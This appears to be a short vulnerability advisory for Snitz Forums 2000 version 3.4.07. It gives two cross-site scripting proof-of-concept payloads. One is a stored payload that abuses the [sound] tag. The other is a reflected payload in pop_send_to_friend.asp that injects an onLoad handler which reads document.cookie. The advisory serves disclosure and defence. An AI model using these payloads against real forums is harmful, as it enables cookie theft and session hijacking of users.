Snitz Forums 2000 version 3.4.07 suffers from cross site scripting vulnerabilities.
fbe830d076100f57e540a54da49f464fced24007b9a5d42ebb17e035b7cbfe6b**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad
="alert(document.cookie)">
Note the space: onLoad<space>="alert(document.cookie)"
######
--
Andrea Fabrizi
http://www.andreafabrizi.it
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed